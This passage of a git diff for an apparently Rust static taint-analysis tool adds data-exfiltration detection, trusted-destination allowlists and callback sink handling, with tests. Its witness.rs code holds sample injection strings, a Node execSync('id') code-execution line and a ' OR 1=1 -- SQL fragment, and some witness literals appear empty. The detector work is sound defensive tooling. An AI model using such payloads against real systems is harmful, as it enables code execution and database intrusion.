std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; state.widen_at_loop_head(BlockId(0), &ssa); diff --git a/src/symex/transfer.rs b/src/symex/transfer.rs index 3a18cd2f..7b04289c 100644 --- a/src/symex/transfer.rs +++ b/src/symex/transfer.rs @@ -1012,6 +1012,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } @@ -1591,6 +1593,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); let ctx = make_summary_ctx(&gs); @@ -1659,6 +1662,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); let ctx = make_summary_ctx(&gs); @@ -1727,6 +1731,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); let ctx = make_summary_ctx(&gs); @@ -1790,6 +1795,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); let ctx = make_summary_ctx(&gs); @@ -1853,6 +1859,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); let ctx = make_summary_ctx(&gs); @@ -2050,6 +2057,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); @@ -2128,6 +2136,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); @@ -2207,6 +2216,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); // Second "send", in ns B, also with same arity → ambiguous bare-name @@ -2236,6 +2246,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); // Also register the type-qualified name so Attempt 1 can find it @@ -2265,6 +2276,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); @@ -2343,6 +2355,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); @@ -2423,6 +2436,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); insert_java_summary( @@ -2451,6 +2465,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); // No "HttpClient.send" summary registered, disambiguation has 0 exact matches diff --git a/src/symex/witness.rs b/src/symex/witness.rs index 57a0fe99..d8574929 100644 --- a/src/symex/witness.rs +++ b/src/symex/witness.rs @@ -204,8 +204,15 @@ fn sink_cap(finding: &Finding, cfg: &Cfg) -> Cap { /// Select a witness payload string based on the vulnerability class. fn witness_payload(cap: Cap) -> &'static str { - // Check bits in priority order (most specific first) - if cap.intersects(Cap::CODE_EXEC) { + // Check bits in priority order (most specific first). + // + // `DATA_EXFIL` is checked before the action-class caps (CODE_EXEC, SQL, + // etc.) because a data-exfil sink reflects what the *attacker reads*, + // not what they *do*: the witness needs to look like a leaked secret + // ("") rather than an injected payload ("' OR 1=1 --"). + if cap.intersects(Cap::DATA_EXFIL) { + "" + } else if cap.intersects(Cap::CODE_EXEC) { "require('child_process').execSync('id')" } else if cap.intersects(Cap::HTML_ESCAPE) { "" @@ -639,9 +646,21 @@ mod tests { witness_payload(Cap::DESERIALIZE), "malicious_serialized_object" ); + assert_eq!(witness_payload(Cap::DATA_EXFIL), ""); assert_eq!(witness_payload(Cap::CRYPTO), "TAINTED"); // fallback } + #[test] + fn test_witness_payload_data_exfil_wins_over_action_caps() { + // A `fetch` call's body slot can carry both DATA_EXFIL (the leak + // class) and the underlying action cap (e.g. SSRF) when the same + // sink is multi-gated. The witness should reflect the *leaked* + // value (a session token) rather than an injection payload, the + // attacker is reading data, not writing it. + let combined = Cap::DATA_EXFIL | Cap::SSRF; + assert_eq!(witness_payload(combined), ""); + } + #[test] fn test_witness_payload_code_exec_separate_from_xss() { // CODE_EXEC must return a code-execution payload, not an XSS one. @@ -776,6 +795,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { @@ -831,6 +852,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let cfg = Cfg::new(); let finding = Finding { @@ -892,6 +915,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { @@ -954,6 +979,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { diff --git a/src/taint/backwards.rs b/src/taint/backwards.rs index a91f0c57..8294c0c1 100644 --- a/src/taint/backwards.rs +++ b/src/taint/backwards.rs @@ -752,6 +752,7 @@ mod tests { exception_edges: Vec::new(), field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + synthetic_externals: std::collections::HashSet::new(), }; (ssa, cfg) @@ -766,6 +767,47 @@ mod tests { assert_eq!(d.validated_false, 0); } + /// Regression guard: the cap-routing logic must round-trip + /// `Cap::DATA_EXFIL` exactly like every other cap. The backwards + /// engine treats the demand as opaque bits, so if a future change + /// accidentally narrows the type of `caps` (e.g. a hardcoded mask) + /// the data-exfiltration cap stops surviving the walk. + #[test] + fn demand_state_roundtrips_data_exfil_cap() { + let d = DemandState::new(Cap::DATA_EXFIL); + assert_eq!(d.caps, Cap::DATA_EXFIL); + assert!(d.caps.contains(Cap::DATA_EXFIL)); + // Sanity: combined demand keeps the bit alongside SSRF (the two + // most-frequently-co-occurring caps on outbound HTTP gates). + let combined = DemandState::new(Cap::DATA_EXFIL | Cap::SSRF); + assert!(combined.caps.contains(Cap::DATA_EXFIL)); + assert!(combined.caps.contains(Cap::SSRF)); + } + + /// The backwards driver must classify a `DATA_EXFIL`-capable source + /// even when the sink demand is *exactly* `DATA_EXFIL` (no other + /// caps). Mirrors `driver_walks_source_to_sink` but pins the cap so + /// a future change that intersects with a wider mask (and thus + /// silently widens the demand) is caught. + #[test] + fn driver_walks_data_exfil_source_to_sink() { + let (ssa, mut cfg) = build_trivial_source_body(); + // Tag the source CFG node with a Source(DATA_EXFIL) label so + // the cap-match path (the one that actually rules end-to-end + // routing) exercises the bit. + let src_node = NodeIndex::new(0); + cfg[src_node] + .taint + .labels + .push(DataLabel::Source(Cap::DATA_EXFIL)); + + let ctx = BackwardsCtx::new(&ssa, &cfg, Lang::JavaScript); + let flows = analyse_sink_backwards(&ctx, SsaValue(1), NodeIndex::new(1), Cap::DATA_EXFIL); + assert_eq!(flows.len(), 1, "exactly one DATA_EXFIL flow expected"); + assert!(flows[0].is_confirmation(), "must confirm at the source"); + assert_eq!(flows[0].sink_caps, Cap::DATA_EXFIL); + } + #[test] fn backward_transfer_source_terminates() { let (ssa, _cfg) = build_trivial_source_body(); @@ -800,6 +842,7 @@ mod tests { exception_edges: Vec::new(), field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + synthetic_externals: std::collections::HashSet::new(), }; let demand = DemandState::new(Cap::all()); let (step, next) = backward_transfer(&ssa, SsaValue(0), &demand); @@ -832,6 +875,7 @@ mod tests { exception_edges: Vec::new(), field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + synthetic_externals: std::collections::HashSet::new(), }; let demand = DemandState::new(Cap::all()); let (step, _next) = backward_transfer(&ssa, SsaValue(0), &demand); @@ -919,6 +963,7 @@ mod tests { exception_edges: Vec::new(), field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + synthetic_externals: std::collections::HashSet::new(), }; let demand = DemandState::new(Cap::all()); @@ -1007,6 +1052,7 @@ mod tests { exception_edges: Vec::new(), field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + synthetic_externals: std::collections::HashSet::new(), }; let ctx = BackwardsCtx::new(&ssa, &cfg, Lang::JavaScript); diff --git a/src/taint/ssa_transfer/mod.rs b/src/taint/ssa_transfer/mod.rs index f844e7ea..a893d512 100644 --- a/src/taint/ssa_transfer/mod.rs +++ b/src/taint/ssa_transfer/mod.rs @@ -4026,6 +4026,45 @@ pub(super) fn transfer_inst( } } + // Constructor cap narrowing: a `new X(...)` call returns an object + // instance, not a string. Caps that name a string-shaped sink + // pattern (path argument, format string, URL component, JSON + // input) cannot fire on a wrapper object, so they must not + // survive the construction. Without this narrowing, a tainted + // argument to `new SdkClient(secret)` propagates `Cap::all()` + // into the wrapper, every method call on the wrapper inherits + // those bits via receiver propagation, and any downstream + // `fs.write*` / `printf` / `JSON.parse` on a string property + // returned by an SDK method (e.g. `client.create().id`) flags + // a phantom flow that has no real path-traversal etc. payload. + // + // Caps preserved (legitimately travel through wrappers): + // - SHELL_ESCAPE / SQL_QUERY / CODE_EXEC / DESERIALIZE: a + // wrapper that captures a tainted command/query string can + // replay it via methods, the bit must survive the wrap. + // - SSRF / DATA_EXFIL: URL/payload concerns persist on URL or + // content-bearing objects. + // - UNAUTHORIZED_ID: ownership obligation persists on a + // wrapper that carries a request-bound identifier. + // - ENV_VAR: provenance marker, never a sink trigger by + // itself. + // - HTML_ESCAPE: kept for safety, conservative dual concern + // (a wrapper used as a string in template rendering). + // - CRYPTO: kept conservatively. + // + // Caps stripped on construction: + // - FILE_IO: path strings only. + // - FMT_STRING: printf-style format args only. + // - URL_ENCODE: URL components only. + // - JSON_PARSE: parser inputs only. + if info.call.is_constructor && !return_bits.is_empty() { + let strip = Cap::FILE_IO | Cap::FMT_STRING | Cap::URL_ENCODE | Cap::JSON_PARSE; + return_bits &= !strip; + if return_bits.is_empty() { + return_origins.clear(); + } + } + // Write result if return_bits.is_empty() { state.remove(inst.value); @@ -4314,16 +4353,41 @@ pub(super) fn transfer_inst( // summary-extraction mode so baseline probes keep their // intrinsic-source contract. Gate is set by the caller, e.g. // always-on for JS/TS, only AnonymousFunction bodies for Java. + // + // The `Param` branch fires for both real formal parameters and + // synthetic externals injected by lowering for free / closure- + // captured variables (`SsaBody.synthetic_externals`). Only real + // formals should receive the heuristic seed: a closure capturing + // an out-of-scope `userId` / `cmd` / `payload` is NOT a handler + // entry point — the variable is supplied by the enclosing scope + // and seeding it here produces phantom sources anchored to the + // function's declaration line. if transfer.auto_seed_handler_params && !seeded_from_scope && matches!(&inst.op, SsaOp::Param { .. }) + && !ssa.synthetic_externals.contains(&inst.value) { if let Some(var_name) = ssa .value_defs .get(inst.value.0 as usize) .and_then(|vd| vd.var_name.as_deref()) { - if crate::labels::is_js_ts_handler_param_name(var_name) { + // Direct match: the Param's name itself is a handler + // identifier (e.g. `input`, `cmd`, `userId`). + // + // Root-prefix match: dotted-path Params produced by + // lowering for member-expression uses inside the body + // (`input.cmd` — an unbacked phantom Param) inherit the + // seed when their *root* is a handler-param formal. + // Without this, the field-aware suppression downstream + // sees `input.cmd` as a "clean field" and strips + // `input`'s taint, even though `input.cmd` is just a + // structural projection of the auto-seeded formal. + let root_is_handler = var_name + .split_once('.') + .map(|(root, _)| crate::labels::is_js_ts_handler_param_name(root)) + .unwrap_or(false); + if crate::labels::is_js_ts_handler_param_name(var_name) || root_is_handler { let origin = TaintOrigin { node: inst.cfg_node, source_kind: SourceKind::UserInput, @@ -5245,6 +5309,15 @@ fn collect_block_events( let sink_info = resolve_sink_info(info, transfer); let mut sink_caps = sink_info.caps; + // [detectors.data_exfil] enabled toggle. When the detector class is + // disabled per-project, strip Cap::DATA_EXFIL from sink_caps so no + // taint-data-exfiltration event is emitted regardless of which gate + // would have fired. Strict-additive: defaults to enabled, no effect + // for projects that don't opt in. + if !crate::utils::detector_options::current().data_exfil.enabled { + sink_caps &= !Cap::DATA_EXFIL; + } + // Type-qualified sink resolution: when normal sink resolution found nothing, // try using the receiver's inferred type to construct a qualified callee name. if sink_caps.is_empty() { @@ -5324,50 +5397,83 @@ fn collect_block_events( for &(cb_idx, src_caps) in &resolved.source_to_callback { let cb_name = info.arg_callees.get(cb_idx).and_then(|ac| ac.as_ref()); if let Some(cb_callee) = cb_name { - if let Some(cb_resolved) = - resolve_callee(transfer, cb_callee, caller_func, 0) - { - let matching_sink_caps = cb_resolved - .param_to_sink - .iter() - .filter(|(_, caps)| !(src_caps & *caps).is_empty()) - .fold(Cap::empty(), |acc, (_, c)| acc | *c); - if !matching_sink_caps.is_empty() { - let source_kind = - crate::labels::infer_source_kind(src_caps, callee); - let origin = TaintOrigin { - node: inst.cfg_node, - source_kind, - source_span: None, - }; - // Pick callback-path sink sites. - // The callback callee's `param_to_sink_sites` - // drives attribution when available; cap-only - // fallback yields `primary_sink_site = None`. - let cb_tainted: Vec<( - SsaValue, - Cap, - SmallVec<[TaintOrigin; 2]>, - )> = vec![( + // First try the standard summary-based resolution + // path (covers user-defined functions and built-ins + // that landed in label-derived summaries upstream). + // If that yields no matching sink caps, fall back + // to gated-sink classification on the callback + // callee's name — gated sinks (e.g. + // `child_process.exec` post-fix) carry their + // payload positions in the gate, not in any + // summary, and the callback pipeline still needs + // those positions to pair source caps against + // param_to_sink. + let cb_resolved = resolve_callee(transfer, cb_callee, caller_func, 0); + let mut matching_sink_caps = Cap::empty(); + let cb_param_to_sink_sites: Vec<(usize, SmallVec<[SinkSite; 1]>)> = + if let Some(ref r) = cb_resolved { + matching_sink_caps = r + .param_to_sink + .iter() + .filter(|(_, caps)| !(src_caps & *caps).is_empty()) + .fold(Cap::empty(), |acc, (_, c)| acc | *c); + r.param_to_sink_sites.clone() + } else { + vec![] + }; + if matching_sink_caps.is_empty() { + // Gate-fallback: classify_gated_sink yields the + // callback callee's payload positions + sink + // caps directly when the name matches a gated + // sink rule. + let lang_str = transfer.lang.as_str(); + let gates = crate::labels::classify_gated_sink( + lang_str, + cb_callee, + |_| None, + |_| None, + |_| false, + ); + for gm in gates.iter() { + if let DataLabel::Sink(bits) = gm.label { + if !(src_caps & bits).is_empty() { + matching_sink_caps |= bits; + } + } + } + } + if !matching_sink_caps.is_empty() { + let source_kind = + crate::labels::infer_source_kind(src_caps, callee); + let origin = TaintOrigin { + node: inst.cfg_node, + source_kind, + source_span: None, + }; + // Pick callback-path sink sites. + // The callback callee's `param_to_sink_sites` + // drives attribution when available; cap-only + // fallback yields `primary_sink_site = None`. + let cb_tainted: Vec<(SsaValue, Cap, SmallVec<[TaintOrigin; 2]>)> = + vec![( inst.value, src_caps & matching_sink_caps, SmallVec::from_elem(origin, 1), )]; - let cb_sites = pick_primary_sink_sites_from_resolved( - matching_sink_caps, - &cb_resolved.param_to_sink_sites, - ); - emit_ssa_taint_events( - events, - inst.cfg_node, - cb_tainted, - matching_sink_caps, - false, - None, - true, - cb_sites, - ); - } + let cb_sites = pick_primary_sink_sites_from_resolved( + matching_sink_caps, + &cb_param_to_sink_sites, + ); + emit_ssa_taint_events( + events, + inst.cfg_node, + cb_tainted, + matching_sink_caps, + false, + None, + true, + cb_sites, + ); } } } @@ -5563,8 +5669,62 @@ fn collect_block_events( // loop with the legacy `(sink_caps, info.call.sink_payload_args, // info.call.destination_uses)` triple, preserving prior behavior // for every non-multi-gate site. + // + // Cross-file wrapper case: when the resolved callee summary carries + // [`SinkInfo::param_to_gate_filters`] (the wrapper's body contains + // an inner multi-gate sink whose per-position cap split was lifted + // at extraction time), expand one filter pass per `(param_idx, + // label_caps)` entry restricted to that single arg position. This + // preserves SSRF-vs-DATA_EXFIL attribution across a + // `fn forward(url, body) { fetch(url, {body}) }` wrapper that is + // NOT itself a known gated sink. + // + // Params NOT covered by `param_to_gate_filters` retain coverage + // via their `param_to_sink` entry, expanded per-position so the + // emitted event's `sink_caps` reflects the param-specific cap + // mask rather than the aggregate union. This matters for + // wrappers that mix gated sinks with label-based sinks + // (e.g. `fn dispatch(cmd, url) { execSync(cmd); fetch(url) }`), + // where param 0 reaches a non-gated SHELL_ESCAPE sink and the + // gate-filter list only carries the SSRF gate for param 1. let multi_gate = info.call.gate_filters.len() > 1; + let summary_per_position = !multi_gate && !sink_info.param_to_gate_filters.is_empty(); type FilterEntry<'a> = (Cap, Option<&'a [usize]>, Option<&'a [String]>); + // Per-position dispatch source for the summary-per-position branch. + // First, every entry from `param_to_gate_filters` (cap-narrowed by + // the inner gate); then, for any param_to_sink index NOT mentioned + // in `param_to_gate_filters`, an entry using that param's + // `param_to_sink` cap mask. + struct PerPosEntry { + idx: [usize; 1], + caps: Cap, + } + let per_position_entries: Vec = if summary_per_position { + let mut out: Vec = + Vec::with_capacity(sink_info.param_to_gate_filters.len()); + for (idx, caps) in &sink_info.param_to_gate_filters { + out.push(PerPosEntry { + idx: [*idx], + caps: *caps, + }); + } + for (idx, caps) in &sink_info.param_to_sink { + if sink_info + .param_to_gate_filters + .iter() + .any(|(i, _)| *i == *idx) + { + continue; + } + out.push(PerPosEntry { + idx: [*idx], + caps: *caps, + }); + } + out + } else { + Vec::new() + }; let filter_iter: smallvec::SmallVec<[FilterEntry<'_>; 2]> = if multi_gate { info.call .gate_filters @@ -5577,11 +5737,37 @@ fn collect_block_events( ) }) .collect() + } else if summary_per_position { + per_position_entries + .iter() + .map(|e| (sink_caps & e.caps, Some(e.idx.as_slice()), None)) + .collect() } else { smallvec::smallvec![(sink_caps, None, None)] }; for (filter_caps, positions_override, destination_override) in filter_iter { + let mut filter_caps = filter_caps; + + // Per-filter destination allowlist for DATA_EXFIL. When this + // filter would emit Cap::DATA_EXFIL and the call's destination + // arg has a trusted static prefix (configured via + // detectors.data_exfil.trusted_destinations), drop the bit + // for this filter only. Other gates on the same call site + // (notably SSRF) are unaffected. Mirrors the semantics of + // is_call_data_exfil_destination_trusted but operates per-gate + // so a multi-gate fetch site keeps SSRF attribution while + // dropping DATA_EXFIL when the destination is trusted. + if filter_caps.intersects(Cap::DATA_EXFIL) { + if let SsaOp::Call { ref args, .. } = inst.op { + if let Some(ref abs) = state.abstract_state { + if is_call_data_exfil_destination_trusted(inst, args, abs, cfg) { + filter_caps &= !Cap::DATA_EXFIL; + } + } + } + } + if filter_caps.is_empty() { continue; } @@ -6464,6 +6650,15 @@ struct SinkInfo { /// coordinates. Used to attribute findings to the dangerous /// callee-internal instruction. param_to_sink_sites: Vec<(usize, SmallVec<[SinkSite; 1]>)>, + /// Per-parameter gate-filter cap masks lifted from the callee's + /// inner multi-gate sink call sites. Mirrors + /// [`crate::summary::ssa_summary::SsaFuncSummary::param_to_gate_filters`]. + /// When non-empty, the dispatcher in [`collect_block_events`] + /// expands one filter pass per `(param_idx, label_caps)` entry so + /// a wrapper carrying multiple gate classes (e.g. SSRF on the URL + /// arg + DATA_EXFIL on the body arg) attributes findings per cap + /// instead of joining them. + param_to_gate_filters: Vec<(usize, Cap)>, } fn resolve_sink_info(info: &NodeInfo, transfer: &SsaTaintTransfer) -> SinkInfo { @@ -6479,6 +6674,7 @@ fn resolve_sink_info(info: &NodeInfo, transfer: &SsaTaintTransfer) -> SinkInfo { caps: label_sink_caps, param_to_sink: vec![], param_to_sink_sites: vec![], + param_to_gate_filters: vec![], }; } @@ -6500,6 +6696,7 @@ fn resolve_sink_info(info: &NodeInfo, transfer: &SsaTaintTransfer) -> SinkInfo { caps: r.sink_caps, param_to_sink: r.param_to_sink, param_to_sink_sites: r.param_to_sink_sites, + param_to_gate_filters: r.param_to_gate_filters, }; } @@ -6525,6 +6722,7 @@ fn resolve_sink_info(info: &NodeInfo, transfer: &SsaTaintTransfer) -> SinkInfo { caps: r.sink_caps, param_to_sink: r.param_to_sink, param_to_sink_sites: r.param_to_sink_sites, + param_to_gate_filters: r.param_to_gate_filters, }; } } @@ -6533,6 +6731,7 @@ fn resolve_sink_info(info: &NodeInfo, transfer: &SsaTaintTransfer) -> SinkInfo { caps: Cap::empty(), param_to_sink: vec![], param_to_sink_sites: vec![], + param_to_gate_filters: vec![], } } @@ -7383,6 +7582,16 @@ fn is_abstract_safe_for_sink( } } + // DATA_EXFIL, destination allowlist via configured trusted prefixes. + // Mirrors the SSRF prefix-lock above but consults the user-configured + // [detectors.data_exfil] table's trusted_destinations key. Strict- + // additive: when no destinations are configured this is a no-op. + if sink_caps.intersects(Cap::DATA_EXFIL) + && is_inst_data_exfil_destination_trusted(inst, abs, cfg) + { + return true; + } + // SHELL_ESCAPE, static-map finite-domain safety. When every tainted // payload value is proved by the static-HashMap-lookup analysis to come // from a bounded set of metacharacter-free literals, the call cannot @@ -7509,6 +7718,15 @@ fn is_call_abstract_safe( } } + // DATA_EXFIL, destination-allowlist match. Mirrors the SSRF arm above + // for the Call path. Strict-additive: a no-op when + // detectors.data_exfil.trusted_destinations is empty. + if sink_caps.intersects(Cap::DATA_EXFIL) + && is_call_data_exfil_destination_trusted(inst, args, abs, cfg) + { + return true; + } + // SHELL_ESCAPE, static-map finite-domain safety on every non-empty arg // group. Mirrors the non-Call path so suppression fires regardless of // which branch the sink detector took. @@ -7785,6 +8003,118 @@ fn is_static_map_shell_safe( }) } +/// `DATA_EXFIL` destination-allowlist match. +/// +/// Returns `true` when `prefix` (the proven static prefix of an outbound +/// destination URL, sourced from either the abstract string domain or an +/// inline literal seen by CFG) starts with one of the user-configured +/// trusted destinations. Used by the abstract sink-suppression code to +/// drop the [`Cap::DATA_EXFIL`] bit on legitimate forwarding pipelines +/// (telemetry, internal APIs, analytics) without affecting other caps on +/// the same call. +/// +/// Match semantics: a trusted destination entry is treated as a string +/// prefix. An empty entry never matches (empty prefix would match +/// every URL, which is never a useful allowlist). Entries should be +/// origin-pinned (e.g. `https://api.internal/`) so partial-host +/// collisions cannot occur. +fn is_string_prefix_trusted_destination(prefix: &str, trusted: &[String]) -> bool { + if prefix.is_empty() { + return false; + } + trusted + .iter() + .any(|t| !t.is_empty() && prefix.starts_with(t.as_str())) +} + +/// Check whether the call site's destination argument (positional arg 0) is +/// a known trusted destination per +/// [`crate::utils::detector_options::DataExfilDetectorOptions::trusted_destinations`]. +/// +/// Returns `true` when the URL argument has a static prefix matching one +/// of the configured trusted entries. Three sources are consulted in +/// order: +/// +/// 1. The CFG node's syntactic literal (`info.call.arg_string_literals[0]`), +/// populated for any positional argument that is a syntactic string +/// literal at the call site. Catches the common case +/// `fetch('https://api.internal/...', {...})` whose URL never enters +/// the abstract domain because it is not bound to an identifier. +/// 2. The inline template-literal prefix attached to the call node +/// directly (matches the SSRF prefix-lock fallback). +/// 3. The abstract string-domain prefix of arg 0's SSA value group. +/// Catches identifier-bound URLs like +/// `let url = \`https://api.internal/${id}\`; fetch(url, {...})`. +/// +/// Returns `false` when no trusted destinations are configured. +fn is_call_data_exfil_destination_trusted( + inst: &SsaInst, + args: &[SmallVec<[SsaValue; 2]>], + abs: &AbstractState, + cfg: &Cfg, +) -> bool { + let opts = crate::utils::detector_options::current(); + let trusted = &opts.data_exfil.trusted_destinations; + if trusted.is_empty() { + return false; + } + let node_info = &cfg[inst.cfg_node]; + if let Some(Some(lit)) = node_info.call.arg_string_literals.first() { + if is_string_prefix_trusted_destination(lit, trusted) { + return true; + } + } + if let Some(prefix) = node_info.string_prefix.as_deref() { + if is_string_prefix_trusted_destination(prefix, trusted) { + return true; + } + } + if let Some(first_arg) = args.first() { + if !first_arg.is_empty() + && first_arg.iter().all(|v| { + abs.get(*v) + .string + .prefix + .as_deref() + .is_some_and(|p| is_string_prefix_trusted_destination(p, trusted)) + }) + { + return true; + } + } + false +} + +/// Non-Call variant of [`is_call_data_exfil_destination_trusted`]: used by +/// [`is_abstract_safe_for_sink`] where the destination is read off the +/// instruction's own used SSA values rather than a positional Call arg +/// list. Falls back to the node-attached `string_prefix` when no abstract +/// fact is available. +fn is_inst_data_exfil_destination_trusted(inst: &SsaInst, abs: &AbstractState, cfg: &Cfg) -> bool { + let opts = crate::utils::detector_options::current(); + let trusted = &opts.data_exfil.trusted_destinations; + if trusted.is_empty() { + return false; + } + let node_info = &cfg[inst.cfg_node]; + if let Some(prefix) = node_info.string_prefix.as_deref() { + if is_string_prefix_trusted_destination(prefix, trusted) { + return true; + } + } + let used = inst_use_values(inst); + if used.is_empty() { + return false; + } + used.iter().all(|v| { + abs.get(*v) + .string + .prefix + .as_deref() + .is_some_and(|p| is_string_prefix_trusted_destination(p, trusted)) + }) +} + /// SSRF safety: prefix includes scheme + full host + path separator. /// /// Soundness: if the prefix contains `scheme://host/`, the attacker cannot @@ -8026,6 +8356,21 @@ struct ResolvedSummary { /// retained; in that case `param_to_sink` alone still drives sink /// detection. param_to_sink_sites: Vec<(usize, SmallVec<[SinkSite; 1]>)>, + /// Per-parameter gate-filter cap masks lifted from the callee's + /// inner multi-gate sink call sites. Mirrors + /// [`crate::summary::ssa_summary::SsaFuncSummary::param_to_gate_filters`]. + /// + /// Each `(param_idx, label_caps)` entry says "this caller-side + /// parameter flows to a callee-internal gated sink whose narrowed + /// caps are `label_caps`". When non-empty, the multi-gate dispatch + /// in [`collect_block_events`] expands one filter pass per entry so + /// the emitted event's `sink_caps` reflect the gate-specific cap + /// rather than the aggregate union, preserving SSRF-vs-DATA_EXFIL + /// (and similar) attribution through wrapper functions. + /// + /// Empty for label, local-summary, FuncSummary, and interop paths, + /// these forms do not retain per-gate cap detail. + param_to_gate_filters: Vec<(usize, Cap)>, propagates_taint: bool, propagating_params: Vec, /// Parameter indices whose container identity flows to return value. @@ -8229,18 +8574,34 @@ fn resolve_callee_full( param_return_paths: vec![], points_to: Default::default(), field_points_to: Default::default(), + param_to_gate_filters: vec![], }); } - // Try label classification for the bound function (by leaf name) + // Try label classification for the bound function (by leaf name). + // Consult both flat rules (`classify_all`) and gated sinks: a + // callback bound to a gated sink (e.g. passing + // `child_process.exec` directly as the callback) still needs to + // surface its `Sink` capability so the source/callback pairing + // logic can match `param_to_sink` against the caller's source. + // The gate's `payload_args` translate directly into + // `param_to_sink` index entries. let labels = crate::labels::classify_all( transfer.lang.as_str(), &real_key.name, transfer.extra_labels, ); - if !labels.is_empty() { + let gate_matches = crate::labels::classify_gated_sink( + transfer.lang.as_str(), + &real_key.name, + |_| None, + |_| None, + |_| false, + ); + if !labels.is_empty() || !gate_matches.is_empty() { let mut source_caps = Cap::empty(); let mut sanitizer_caps = Cap::empty(); let mut sink_caps = Cap::empty(); + let mut param_to_sink: Vec<(usize, Cap)> = vec![]; for lbl in &labels { match lbl { DataLabel::Source(bits) => source_caps |= *bits, @@ -8248,11 +8609,25 @@ fn resolve_callee_full( DataLabel::Sink(bits) => sink_caps |= *bits, } } + for gm in gate_matches.iter() { + if let DataLabel::Sink(bits) = gm.label { + sink_caps |= bits; + // Map the gate's payload_args to per-param sink entries + // so source-to-callback pairing can match by index. + // Skip the dynamic-activation sentinel — without a + // concrete arity we can't enumerate positions here. + if gm.payload_args != crate::labels::ALL_ARGS_PAYLOAD { + for &idx in gm.payload_args { + param_to_sink.push((idx, bits)); + } + } + } + } return Some(ResolvedSummary { source_caps, sanitizer_caps, sink_caps, - param_to_sink: vec![], + param_to_sink, param_to_sink_sites: vec![], propagates_taint: false, propagating_params: vec![], @@ -8270,6 +8645,7 @@ fn resolve_callee_full( param_return_paths: vec![], points_to: Default::default(), field_points_to: Default::default(), + param_to_gate_filters: vec![], }); } } @@ -8414,6 +8790,7 @@ fn resolve_callee_full( param_return_paths: vec![], points_to: Default::default(), field_points_to: Default::default(), + param_to_gate_filters: vec![], }); } } else { @@ -8463,6 +8840,7 @@ fn resolve_callee_full( param_return_paths: vec![], points_to: Default::default(), field_points_to: Default::default(), + param_to_gate_filters: vec![], }; match widened.len() { 0 => {} @@ -8533,6 +8911,7 @@ fn resolve_callee_full( param_return_paths: vec![], points_to: Default::default(), field_points_to: Default::default(), + param_to_gate_filters: vec![], }); } } @@ -8714,6 +9093,7 @@ fn convert_ssa_to_resolved_for_caller( param_return_paths: ssa_sum.param_return_paths.clone(), points_to: ssa_sum.points_to.clone(), field_points_to: ssa_sum.field_points_to.clone(), + param_to_gate_filters: ssa_sum.param_to_gate_filters.clone(), } } @@ -8810,6 +9190,20 @@ fn merge_resolved_summaries_fanout( } } + // param_to_gate_filters: dedup-union (idx, caps) pairs. Each + // implementer may carry its own per-position cap split; the union + // preserves cap attribution from any implementer reachable via + // virtual dispatch. + for (idx, caps) in r.param_to_gate_filters { + if !acc + .param_to_gate_filters + .iter() + .any(|&(i, c)| i == idx && c == caps) + { + acc.param_to_gate_filters.push((idx, caps)); + } + } + // SSA-precision fields: drop on any disagreement. if acc.return_type != r.return_type { acc.return_type = None; diff --git a/src/taint/ssa_transfer/state.rs b/src/taint/ssa_transfer/state.rs index a9fdd8c8..1d0f5350 100644 --- a/src/taint/ssa_transfer/state.rs +++ b/src/taint/ssa_transfer/state.rs @@ -753,6 +753,8 @@ fn origin_sort_key(o: &TaintOrigin) -> (usize, usize, u8, usize) { crate::labels::SourceKind::Database => 3, 